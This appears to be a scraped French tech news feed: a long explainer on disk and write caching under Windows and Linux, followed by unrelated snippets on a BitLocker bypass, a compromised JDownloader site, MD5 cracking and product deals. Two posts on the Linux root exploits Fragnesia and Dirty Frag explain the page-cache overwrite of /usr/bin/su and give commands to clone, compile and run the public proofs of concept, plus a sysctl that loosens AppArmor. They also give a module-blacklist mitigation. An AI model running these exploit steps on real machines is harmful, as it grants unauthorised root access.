Sous Windows et Linux, les SSD, disques durs et périphériques USB utilisent un cache disque afin d’améliorer les performances des lectures et écritures.

Le cache d’écriture permet notamment d’accélérer les copies de fichiers, mais peut aussi provoquer des pertes de données ou des corruptions de fichiers en cas de coupure électrique ou de débranchement USB brutal.

Dans ce guide, vous apprendrez comment fonctionne le cache disque et le cache d’écriture sous Windows et Linux, leurs avantages, leurs risques et comment éviter les corruptions disque.

De manière générale, si vous souhaitez comprendre le principe du cache, consultez ce guide annexe : Qu’est-ce qu’un cache (en informatique).
Du côté de Windows, consultez aussi ce guide : Cache d’écriture Windows : suppression rapide ou meilleures performances

Cache disque : ce qu’il faut retenir

• Le cache disque améliore les performances
• Les données sont temporairement stockées en mémoire RAM
• Le cache d’écriture accélère les copies de fichiers
• Une coupure électrique ou un retrait USB brutal peut provoquer une corruption de données
• Sous Windows, le mode “Suppression rapide” limite les risques sur les clés USB

Le cache disque est utile, mais nécessite d’utiliser correctement l’éjection sécurisée USB.

Qu’est-ce que le cache disque

Le cache disque est une mémoire temporaire utilisée par le système d’exploitation ou le périphérique de stockage afin d’accélérer les lectures et écritures sur un disque dur, un SSD ou une clé USB.

Lorsqu’un fichier est lu ou écrit :

• Les données peuvent être temporairement stockées en mémoire
• Puis écrites plus tard sur le disque physique
• Ou conservées afin d’accélérer les accès suivants

Le cache disque permet ainsi :

• D’améliorer les performances
• Réduire les accès physiques au disque
• Accélérer les copies de fichiers
• Limiter les temps d’attente

Le tableau ci-dessous résume les principaux types de cache disque.

Sous Windows et Linux, le cache disque est utilisé :

• Sur les SSD
• Les disques durs HDD
• Les clés USB
• Les disques externes

À quoi sert le cache disque ?

Le cache disque permet d’améliorer les performances des périphériques de stockage en réduisant les accès directs au disque dur, SSD ou périphérique USB.

Sans cache disque :

• Chaque lecture ou écriture serait effectuée directement sur le support physique
• Les performances seraient beaucoup plus faibles
• Les temps d’accès augmenteraient fortement

Le cache disque sert principalement à :

• Accélérer les lectures de fichiers
• Améliorer les vitesses d’écriture
• Réduire les accès physiques au disque
• Limiter les temps d’attente
• Optimiser les performances du système

Le tableau ci-dessous résume les principaux avantages du cache disque.

Le cache disque est utilisé :

• Par Windows et Linux
• Les SSD
• Les disques durs HDD
• Les clés USB
• Les disques externes

Par exemple :

• Lors d’une copie de fichiers
• Les données peuvent être d’abord écrites dans le cache RAM
• Puis transférées ensuite sur le disque physique

C’est pour cette raison qu’un périphérique USB peut sembler avoir terminé une copie alors que certaines écritures sont encore en attente en arrière-plan.

Comment fonctionne le cache disque sous Windows et Linux ?

Le cache disque fonctionne comme une mémoire tampon entre le système d’exploitation et le périphérique de stockage.

Au lieu d’écrire ou lire directement chaque donnée sur le disque physique :

• Windows ou Linux stocke temporairement les données dans le cache
• Puis les transfère ensuite vers le SSD, disque dur ou périphérique USB

Cela permet :

• D’accélérer les accès disque
• Réduire les temps de latence
• Limiter les accès physiques au disque
• Améliorer les performances générales

Le cache disque peut fonctionner :

• En lecture
• En écriture
• Ou les deux

Cache en lecture

Le cache en lecture conserve temporairement les fichiers ou données récemment utilisés afin d’accélérer les accès suivants.

Par exemple :

• Lorsqu’un programme ou fichier est ouvert plusieurs fois
• Les données peuvent être relues directement depuis le cache RAM
• Sans accéder de nouveau au disque physique

Cela améliore :

• Les temps de chargement
• La réactivité du système
• Les performances des applications

Cache en écriture

Le cache en écriture stocke temporairement les données avant leur écriture réelle sur le disque.

Par exemple :

• Lors d’une copie de fichiers
• Windows écrit d’abord les données en mémoire
• Puis les transfère ensuite vers le périphérique de stockage

Cette méthode permet :

• D’accélérer les copies
• Réduire les accès disque
• Améliorer les performances USB et SSD

Différence entre write-back et write-through

Le tableau ci-dessous résume les deux principales stratégies de cache d’écriture.

Le mode write-back :

• Offre de meilleures performances
• Mais augmente les risques de perte de données

Le mode write-through :

• Est plus sécurisé
• Mais légèrement moins performant

Sous Windows, les stratégies :

• Suppression rapide
• et Meilleures performances

utilisent justement ces mécanismes de cache disque.

Différence entre cache disque et mémoire RAM

Le cache disque et la mémoire RAM sont liés, mais ils ne jouent pas exactement le même rôle sous Windows ou Linux.

La mémoire RAM sert à stocker temporairement :

• Les programmes en cours d’exécution
• Les données utilisées par le système
• Les applications ouvertes

Le cache disque, lui, utilise souvent une partie de la RAM afin d’accélérer les accès au disque dur, SSD ou périphérique USB.

Le tableau ci-dessous résume les principales différences.

Par exemple :

• Lors d’une copie de fichiers
• Windows peut d’abord écrire les données dans le cache RAM
• Puis transférer les données ensuite sur le disque physique

C’est pour cette raison :

• Qu’un transfert peut sembler terminé alors que le disque travaille encore
• Ou qu’un périphérique USB peut rester actif après une copie

C’est pourquoi :

• Une coupure brutale
• Ou un débranchement USB pendant une écriture

peut provoquer :

• Une perte de données
• Une corruption du système de fichiers
• Des erreurs disque.

Cache disque sur SSD, HDD et périphériques USB

Le cache disque est utilisé sur la plupart des périphériques de stockage :

• Disques durs HDD
• SSD
• Clés USB
• Disques externes USB

Mais son fonctionnement et son importance peuvent varier selon le type de support utilisé.

Le tableau ci-dessous résume les principales différences.

Cache des disques durs HDD

Les disques durs mécaniques utilisent fortement le cache disque afin de :

• Réduire les mouvements de la tête de lecture
• Accélérer les accès aux fichiers
• Améliorer les performances générales

Les HDD possèdent aussi :

• Un cache matériel intégré
• Généralement de quelques Mo à plusieurs centaines de Mo

Cache des SSD

Les SSD utilisent également le cache disque, mais de manière différente.

Le cache permet notamment :

• D’accélérer les écritures
• Réduire l’usure des cellules mémoire
• Optimiser les performances du SSD

Certains SSD utilisent aussi :

• Un cache DRAM
• Ou un cache SLC

afin d’améliorer les vitesses de transfert.

Cache des clés USB et disques externes

Sous Windows, les clés USB et disques externes utilisent souvent :

• Le cache système Windows
• Les stratégies :
  • Suppression rapide
  • Meilleures performances

Avec :

• Suppression rapide
  • Windows limite fortement le cache d’écriture
• Meilleures performances
  • Les performances sont meilleures
  • Mais l’éjection sécurisée devient fortement recommandée

Pourquoi le cache disque peut provoquer une perte de données

Le cache disque améliore les performances des SSD, disques durs et périphériques USB, mais il peut aussi provoquer une perte de données lorsque les écritures ne sont pas encore totalement enregistrées sur le disque physique.

Avec le cache en écriture :

• Les données sont d’abord stockées temporairement en mémoire
• Puis écrites ensuite sur le disque

Tant que cette écriture n’est pas terminée :

• Les fichiers ne sont pas encore totalement sauvegardés
• Une interruption peut corrompre les données

Le tableau ci-dessous présente les situations les plus fréquentes.

Les symptômes les plus fréquents sont :

• Fichiers corrompus
• Erreurs NTFS ou EXT4
• Messages CHKDSK ou fsck
• Partition inaccessible
• Clé USB non reconnue
• Linux ou Windows qui refuse de démarrer

Risques avec les périphériques USB

Les clés USB et disques externes sont particulièrement sensibles :

• Lors des copies de fichiers importantes
• Avec le mode Meilleures performances
• Si le périphérique est retiré sans éjection sécurisée

Même si Windows 11/10 utilise souvent : Suppression rapide

il reste conseillé :

• D’attendre la fin des copies
• D’éviter les débranchements brutaux
• D’utiliser l’éjection sécurisée pour les disques externes importants

Limiter les risques de corruption disque

Pour éviter les pertes de données :

• Utilisez l’éjection sécurisée USB
• Évitez les coupures électriques
• Utilisez un onduleur sur PC fixe
• Sauvegardez régulièrement les fichiers importants
• Vérifiez l’état de santé du disque

Les systèmes d’exploitations fournissent des utilitaires de réparation du système de fichiers :

• chkdsk : vérifier les erreurs de disques NTFS (Windows)
• fsck/e2fsck : vérifier et réparer EXT4 (Linux)

Il est important de s’assurer que vos disques n’ont pas de défaillance matériel via SMART :

• Vérifier l’état de santé d’un disque dur ou SSD (Windows)
• Vérifier l’état de santé d’un disque dur ou SSD (Linux)

Cache d’écriture sous Windows : suppression rapide ou meilleures performances

Sous Windows 11/10, le cache d’écriture disque est utilisé afin d’améliorer les performances des SSD, disques durs et périphériques USB.

Windows utilise principalement deux stratégies pour les périphériques USB :

• Suppression rapide
• Meilleures performances

Le mode Suppression rapide réduit fortement l’utilisation du cache d’écriture afin de limiter les risques de corruption lors du retrait d’une clé USB.

Le mode Meilleures performances utilise davantage le cache disque afin d’améliorer :

• Les copies de fichiers
• Les transferts USB
• Les performances des SSD externes

Guide complet :

Cache d’écriture Windows : suppression rapide ou meilleures performances ?

Cache disque sous Linux et écritures différées

Comme Windows, Linux utilise un cache disque afin d’améliorer les performances des SSD, disques durs et périphériques USB.

Sous Linux :

• Les lectures et écritures disque peuvent être temporairement stockées en mémoire RAM
• Puis transférées ensuite vers le disque physique

Le cache disque Linux permet notamment :

• D’accélérer les accès aux fichiers
• Réduire les accès physiques au disque
• Améliorer les performances du système
• Optimiser les écritures SSD et HDD

Le tableau ci-dessous résume les principaux mécanismes utilisés sous Linux.

Écritures différées sous Linux

Sous Linux, les écritures ne sont pas toujours immédiatement enregistrées sur le disque. Lors d’une copie de fichiers, les données peuvent rester temporairement en mémoire avant d’être écrites sur le disque physique.

C’est pour cette raison qu’un périphérique USB peut continuer à travailler après la fin apparente d’une copie et qu’un débranchement brutal peut provoquer une corruption du système de fichiers EXT4.

Vider le cache disque Linux

Linux permet de forcer l’écriture des données en attente avec :

sync

Cette commande demande au système :

• D’écrire immédiatement les données du cache vers le disque

Elle peut être utile :

• Avant de retirer une clé USB
• Après une copie importante
• Lors d’un dépannage Linux

Risques de corruption sous Linux

Comme sous Windows, une coupure électrique, un crash système ou un débranchement USB brutal peuvent provoquer une corruption du système de fichiers EXT4, une perte de données ou encore des erreurs disque sous Linux.

Comment vérifier ou modifier le cache disque sous Windows

Windows 11/10 permet de modifier la stratégie de cache d’écriture des SSD, disques durs et périphériques USB depuis le Gestionnaire de périphériques.

Vous pouvez notamment choisir entre :

• Suppression rapide
• Meilleures performances

Guide complet :

Cache d’écriture Windows : suppression rapide ou meilleures performances ?

Faut-il désactiver le cache disque

Dans la majorité des cas, il n’est pas recommandé de désactiver complètement le cache disque, car celui-ci améliore fortement les performances des SSD, disques durs et périphériques USB.

Le cache disque permet notamment :

• D’accélérer les copies de fichiers
• Réduire les accès physiques au disque
• Améliorer les performances générales du système

Toutefois, dans certaines situations, réduire ou désactiver le cache d’écriture peut être utile :

• Pour limiter les risques de corruption USB
• Sur certains périphériques externes instables
• En cas de problèmes d’éjection USB
• Lors de coupures électriques fréquentes

Le tableau ci-dessous résume les avantages et inconvénients.

Le cache disque est-il dangereux ?

Non, le cache disque améliore fortement les performances des SSD, HDD et clés USB.
Les risques apparaissent surtout lors :

• d’une coupure électrique
• d’un retrait USB brutal
• d’un crash système

Sous Windows 11/10, le mode Suppression rapide est souvent activé par défaut sur les périphériques USB, ce qui limite déjà fortement les risques de corruption lors du retrait d’une clé USB ou d’un disque externe.

Dans la majorité des cas, il est préférable de conserver le cache disque activé et d’utiliser correctement l’éjection sécurisée USB afin de profiter de meilleures performances tout en limitant les risques de perte de données.

Bonnes pratiques pour éviter les corruptions disque

Une corruption du système de fichiers peut provoquer :

• Des fichiers endommagés
• Des erreurs disque
• Une clé USB illisible
• Des erreurs NTFS ou EXT4
• Un Windows ou Linux qui ne démarre plus

Le tableau ci-dessous résume les principales bonnes pratiques permettant de limiter les risques de corruption disque.

Utiliser l’éjection sécurisée USB

Même avec le mode :

• Suppression rapide

il reste conseillé d’éjecter correctement :

• Les disques externes
• Les SSD USB
• Les clés USB importantes

Comment éjecter une clé USB ou un disque externe sous Windows :

Comment éjecter une clé USB ou un disque externe sous Windows

Vérifier régulièrement l’état du disque

Un disque défaillant peut provoquer :

• Des corruptions répétées
• Des erreurs NTFS ou EXT4
• Des pertes de données

Ressources utiles et articles liés

• Qu’est-ce qu’un cache (en informatique)
• Windows 11/10 : comment vider les caches système (DNS, Windows Update, Store, etc.)

• Pourquoi défragmenter son disque : La fragmentation et défragmentation
• Comment défragmenter les disques ou SSD sur Windows 11/10
• 10 meilleurs logiciels pour défragmenter son disque
• Désactiver la défragmentation de son disque ou SSD sur Windows 11/10
• Défragmenter le registre Windows
• Fsutil : optimiser NTFS pour les disques HDD ou SSD
• Optimiser et accélérer son SSD sous Windows 11/10 (guide complet)
• Comment améliorer la vitesse du disque dur (HDD) et les performances de Windows 11/10
• TUTO – Optimiser son SSD
• Nettoyer Windows 11/10 : libérer de l’espace disque et accélérer le PC
• Secteur, cluster, unité d’allocation et bloc de disque : qu’est-ce que c’est
• NTFS, EXT4 : Comprendre les systèmes de fichiers
• Partitionner et formater un disque sous Windows
• Formatage de disque, formatage rapide, formatage bas niveau
• Optimiser le cache disque avec AnalogX CacheBooster

L’article Qu’est-ce que le cache disque sous Windows et Linux est apparu en premier sur malekal.com.

Une faille baptisée YellowKey permet de contourner la protection BitLocker sur certains PC Windows 11 avec un simple accès physique à la machine.

Cet article Votre PC Windows 11 est-il protégé en cas de vol ? YellowKey prouve que non ! a été publié en premier par GinjFo.

Déplacer la barre des tâches en haut ou sur les côtés de l'écran sera bientôt possible sur Windows 11. Microsoft expérimente actuellement de nouvelles options pour vous redonner le contrôle sur votre interface et votre menu Démarrer.

Bon, accrochez vous les amis, car ça enchaine sec sur le kernel Linux en ce moment... Le chercheur William Bowling de l'équipe V12 security vient de lâcher Fragnesia (CVE-2026-46300, CVSS 7.8), un nouvel exploit kernel Linux qui permet d'obtenir un accès root sur toutes les distros majeures, et ce, 8 jours seulement après le patch de Dirty Frag.

Et la mauvaise nouvelle, en fait, c'est que Fragnesia tape dans la même surface d'attaque que Dirty Frag , mais via un bug logique différent qui n'est pas fixé par le patch initial. Donc si vous aviez sagement mis à jour votre noyau le 8 mai dernier en pensant être tranquille, hé bah désolé, vous êtes toujours à poil !

La lignée "Dirty" continue donc tout simplement de s'allonger... Dirty COW en 2016, Dirty Pipe en 2022, Copy Fail le 1er mai 2026, Dirty Frag le 8 mai, et maintenant Fragnesia le 14 mai. Quatre LPE (local privilege escalation) kernel Linux en deux semaines, c'est un record je crois !

Alors comment ça marche ?

Le bug se planque dans la partie du kernel qui gère le chiffrement réseau IPsec. C'est le truc qu'on utilise pour faire du VPN d'entreprise et l'attaque détourne le moteur de chiffrement pour qu'il écrive là où il ne devrait surtout pas écrire.

Le déroulé ensuite est assez simple à comprendre. Il prend un fichier sensible déjà ouvert en lecture (genre /usr/bin/su, le programme qui fait passer en root), il le balance dans une connexion réseau, et il dit au kernel "tiens, chiffre-moi tout ça en IPsec". Le kernel obéit gentiment, sauf qu'au lieu d'envoyer le résultat chiffré sur le réseau, il vient écraser la version du fichier qui est en mémoire avec les octets chiffrés. Du coup /usr/bin/su contient maintenant du code choisi par l'attaquant. Suffit ensuite de taper su pour devenir root.

Et là c'est le drame !

Le pire, c'est qu'il n'y a aucun "tirage au sort" dans tout ça. Pas besoin de gagner une condition de course une fois sur mille comme à l'époque de Dirty COW. Là, c'est 100% reproductible à chaque exécution, ça marche du premier coup.

La cause profonde, c'est une fonction kernel qui assemble des morceaux de paquets réseau et qui oublie au passage que certains morceaux pointent vers de la mémoire qui ne lui appartient pas vraiment (genre la mémoire d'un fichier qu'un autre process est en train de lire). Bowling appelle ça la "famille Dirty Frag" parce que c'est exactement le même genre d'amnésie qui avait permis Dirty Frag la semaine dernière.

Et le patch du 8 mai n'a pas suffi parce qu'il a juste rebouché un trou particulier, sans toucher à la fonction d'origine. D'où la sortie immédiate du PoC le 14 mai, parce qu'autant prévenir tout le monde, plutôt que de laisser un 0-day silencieux circuler dans les milieux moins recommandables d'Internet.

Testez sur votre Linux

Si vous voulez reproduire ça dans un environnement isolé (genre une VM Ubuntu 24.04 avec un kernel 6.8.0-111-generic), c'est simple :

git clone https://github.com/v12-security/pocs.git
cd pocs/fragnesia
gcc -o exp fragnesia.c && ./exp

sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=0

Votre navigateur ne supporte pas la lecture de vidéos HTML5. Voici un
<a href="/fragnesia/fragnesia-1.mp4">lien vers la vidéo</a>.

echo 3 > /proc/sys/vm/drop_caches

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/fragnesia.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"

Cet article a été réalisé en collaboration avec Materiel.net

Les configurations de PC gamer « Full AMD » sont-elles devenues le nouveau standard du gaming haut de gamme ? La question est plus que jamais d’actualité et nous avons décidé de la mettre à l’épreuve en passant au crible la configuration Trinity de Materiel.net.

Cet article a été réalisé en collaboration avec Materiel.net

Il s’agit d’un contenu créé par des rédacteurs indépendants au sein de l’entité Humanoid xp. L’équipe éditoriale de Numerama n’a pas participé à sa création. Nous nous engageons auprès de nos lecteurs pour que ces contenus soient intéressants, qualitatifs et correspondent à leurs intérêts.

En savoir plus

Avec les Googlebook, une toute nouvelle gamme d'ordinateurs premium taillée pour l'intelligence artificielle Gemini, Google s'attaque frontalement aux MacBook d'Apple et aux PC Windows. Voici tout ce qu'il faut savoir sur ces nouveaux ordinateurs prévus pour la fin d'année 2026.

15 ans après les Chromebook, Google monte en puissance avec une nouvelle proposition pour réinventer l'ordinateur portable. Les Googlebook, qui seront lancés en fin d'année, misent sur une intégration profonde de l'IA pour se faire une place sur un marché saturé par Windows et macOS.

Le site officiel de JDownloader a été compromis début mai. Pendant 24 heures, certains liens de téléchargement Windows et Linux ont redirigé vers des fichiers malveillants capables d’installer un RAT Python.

Cet article JDownloader, le site officiel a diffusé des installeurs malveillants Windows et Linux a été publié en premier par GinjFo.

[Deal du jour] Vous souhaitez augmenter le stockage de votre PS5 ? Ce SSD de Lexar de 1 To est en promotion.

Fervent défenseur du « chargeur universel » et de la connectique USB-C, la Commission européenne a envoyé à des journalistes et influenceurs un kit « microphone cravate sans-fil » qui se branche en Lightning. Difficile d'y voir autre chose qu'une erreur du service de communication, mais l'anecdote fait évidemment rire.

Un développeur connu sous le pseudonyme krauseler a glissé un ordinateur complet, écran e-paper et NFC compris, dans une carte de 1 mm d'épaisseur. Le projet, baptisé Muxcard, n'est pas commercial, mais il esquisse à quoi pourrait ressembler l'informatique discrète des prochaines années.

60% des mots de passe hashés en MD5 peuvent être cassés en moins d'une heure... C'est ce que dit en tout cas une étude de Kaspersky publiée cette semaine qui se base sur +231 millions de mots de passe qu'on peut trouver sur le dark web et tirés de fuites ayant eu lieu entre 2023 et 2026. D'après leurs tests, 48% sont craqués en moins d'une minute et 60% en moins d'une heure. C'est pas très rassurant, surtout si votre base tourne encore au MD5.

Ce qui a changé ces dernières années, c'est surtout la puissance des GPU modernes qui n'a cessé d'augmenter. Par exemple, une RTX 5090 monte à 220 milliards de hash MD5 par seconde ce qui représente une augmentation de +34% par rapport à la RTX 4090 ! Du coup, louer un GPU cloud pour lancer une attaque par dictionnaire revient à quelques dizaines de centimes à quelques dollars de l'heure. C'est rentable hein ?

L'étude souligne aussi que 53% des mots de passe du corpus se terminent par des chiffres. Et là, du point de vue des règles hashcat, c'est du pain bénit car les crackers adorent la prévisibilité. Alors attention si vous administrez un service web avec une gestion de comptes utilisateur car les attaques modernes (dictionnaire + règles hashcat) règlent aujourd'hui son compte à une bonne partie du corpus et cela en moins d'une minute. Par contre, les mots de passe longs avec symboles variés résistent encore puisque c'est exponentiel ! Vaut mieux une phrase de passe avec plein de mots et facile à retenir du genre running-douche-afford-laborer-art-amber-deftly-acetone-lego-reoccupy qu'un mot de passe court et complexe comme 3d2^vO$RZ1.

Bref, MD5 pour les mots de passe c'est mort donc si vous avez encore ça dans vos bases, migrez moi tout ce bordel rapidement ! La migration maintenant, ça se fait vers Argon2id en priorité... Je balance pas ça au pif, hein, c'est le standard recommandé par OWASP et le NIST, et c'est memory-hard, donc les GPU ne peuvent pas juste brute-forcer des milliards de hashs par seconde comme avec MD5.

Après si votre stack est ancienne et qu'Argon2id n'est pas dispo, bcrypt reste une option solide. Dans tous les cas, évitez SHA-1, SHA-256 ou SHA-512 sans algorithme adaptatif car ils sont rapides par conception, donc tout aussi crackables que MD5.

Source

Le chercheur en sécu Hyunwoo Kim vient de lâcher dans la nature Dirty Frag, un nouvel exploit kernel Linux qui enchaîne 2 vulnérabilités pour obtenir un accès root sur n'importe quelle distro majeure, avec un taux de réussite proche de 100%.

L'embargo devait tenir encore quelques semaines. Il n'a pas tenu.

Et problème (et c'est pour ça que je vous en parle) c'est que ça marche du feu de dieu, et que personne n'a encore de patch disponible !! Alerte rouge donc !!

La lignée "Dirty" a donc maintenant quatre membres. Dirty COW en 2016, avec ses 9 ans de présence silencieuse dans le kernel avant d'être découvert, Dirty Pipe en 2022, Copy Fail dont je vous parlais il y a tout juste 8 jours, découvert par une IA. Et maintenant Dirty Frag, qui s'appuie sur le même principe que Copy Fail tout en contournant sa mitigation connue.

Alors comment ça marche ?

Le concept du truc c'est l'abus d'un mécanisme tout à fait légitime du kernel Linux : splice(). Cette fonction permet de faire circuler des données entre deux descripteurs de fichiers sans les copier en mémoire. C'est très utile, très performant, mais dans certaines configurations, c'est surtout très catastrophique.

Dirty Frag exploite les modules réseau d'IPsec (ESP) et du protocole RxRPC, ainsi quand un attaquant utilise splice() pour faire passer une page du cache mémoire (disons, /usr/bin/su) dans un buffer réseau, le kernel effectue son chiffrement directement sur cette page en RAM et sans faire de copie.

Résultat, les premiers octets de /usr/bin/su en mémoire sont remplacés par du code malveillant qui ouvre un shell root. Un simple appel à su ensuite, et l'attaquant est root.

Deux CVE sont impliqués dans la chaîne. CVE-2026-43284 qui concerne les modules esp4 et esp6 et qui a été patchée depuis hier et CVE-2026-43500 qui concerne rxrpc et pour celle-ci, y'a aucun patch actuellement à l'heure où j'écris ces lignes.

Le fait de chainer les 2 exploits permet à chacun de combler les angles morts de l'autre. C'est un peu technique mais en gros, la variante ESP requiert les droits de créer un namespace utilisateur, ce qu'Ubuntu peut bloquer via AppArmor. Alors que de son côté, la variante RxRPC ne nécessite pas ce privilège, mais le module rxrpc.ko n'est chargé par défaut que sur... Ubuntu. Du coup, une fois combinés, ils couvrent toutes les distros majeures sans exception.

Hyunwoo Kim a reporté la faille aux mainteneurs des distribs le 30 avril dernier, avec un accord de divulgation coordonnée via [email protected]. Mais un tiers extérieur (appelons le "connard" ^^) a brisé l'embargo hier, d'où la publication immédiate du PoC, avec l'accord des maintainers, pour éviter qu'un exploit silencieux circule sans que personne soit prévenu.

Les versions testées et confirmées vulnérables sont donc Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, Fedora 44.

En gros, si vous avez un kernel compilé depuis début 2017, vous êtes dans le scope.

Tester avec Lima sur macOS

Si vous voulez reproduire ça dans un environnement contrôlé, l'idée c'est de lancer une Ubuntu 24.04 avec le kernel non patché et de faire comme ceci :

# Cloner, compiler, et lancer
git clone https://github.com/V4bel/dirtyfrag.git
cd dirtyfrag
sudo apt install gcc -y && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Et si tout se passe bien, vous obtenez alors un shell root sans faire paniquer le kernel comme chez moi ici :

Après le test, le page cache est contaminé donc avant de faire quoi que ce soit d'autre, faut le nettoyer. :

echo 3 > /proc/sys/vm/drop_caches

Ou plus simple, redémarrez la machine car la modification est uniquement en RAM, donc un reboot permet de repartir de zéro.

Alors que faire ?

Hé bien, comme aucun patch n'est disponible pour la plupart des distros à l'heure où j'écris ces lignes, vous pouvez vous mettre en boule et pleurer. Sauf si vous êtes sous AlmaLinux car eux ont déjà poussé des kernels corrigés. Après vous pouvez aussi sécher vos larmes si vous êtes sur une autre distro, et suivre cette remédiation qui vous prendra trente secondes :

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"

Cette commande fait trois choses : elle blackliste les modules vulnérables pour qu'ils ne se rechargent pas au prochain boot, elle les décharge s'ils sont actifs, et elle nettoie le page cache au cas où il serait déjà corrompu.

Après c'est tranquille à faire car esp4, esp6 et rxrpc ne sont pas des modules que la plupart des machines desktop utilisent au quotidien. Les désactiver n'a donc aucun impact visible sur 99% des setups. Mais un serveur qui fait du VPN IPsec en mode transport ESP, lui, sera affecté...

En tout cas, surveillez ça de près car une fois que votre distro sortira le patch, faudra mettre à jour et rebooter.

Source : https://github.com/V4bel/dirtyfrag

[Deal du jour] Passer à l’OLED sur PC est souvent un investissement de taille, surtout quand on cherche un grand format ultra-rapide. Habituellement affiché à un tarif élitiste, l'un des moniteurs les plus immersifs du marché devient enfin plus accessible grâce à une grosse remise.

Les tablettes d'Apple sont aujourd'hui les références sur ce marché. Cependant, il ne suffit pas de « prendre un iPad » : Apple a complexifié sa gamme au fil des années. Dès lors, 4 modèles sont disponibles en 2026 sans compter les déclinaisons de taille et les anciens modèles. iPad classique, Air, mini ou Pro ? Ce guide comparatif vous aide à choisir le modèle fait pour vous.

La célèbre messagerie chiffrée n'attend pas l'arrivée des ordinateurs quantiques pour agir. Proton Mail intègre dès aujourd'hui un nouveau standard de chiffrement pour contrer les hackers qui interceptent vos messages maintenant en vue de les déchiffrer dans quelques années.

Apple a discrètement retiré le Mac mini avec 256 Go de stockage de la vente. Le nouveau ticket d'entrée passe à 949 euros, soit 250 euros de plus qu'auparavant, mais avec 512 Go de stockage. Une décision liée à la pénurie de Mac mini et Mac Studio, les machines fétiches des développeurs IA.

Besoin de refaire sa gamme de produits tech ? Amazon joue le jeu des French Days avec de nombreux produits en promotion, dont voici une sélection.

Écran cassé de MacBook : réparer ou remplacer ? En 2026, entre hausse des prix, options de réparation et alternatives plus accessibles, le choix devient plus complexe qu’il n’y paraît.

L’article Réparation d’écran MacBook : réparer ou remplacer, le vrai calcul en 2026 est apparu en premier sur Tom’s Hardware.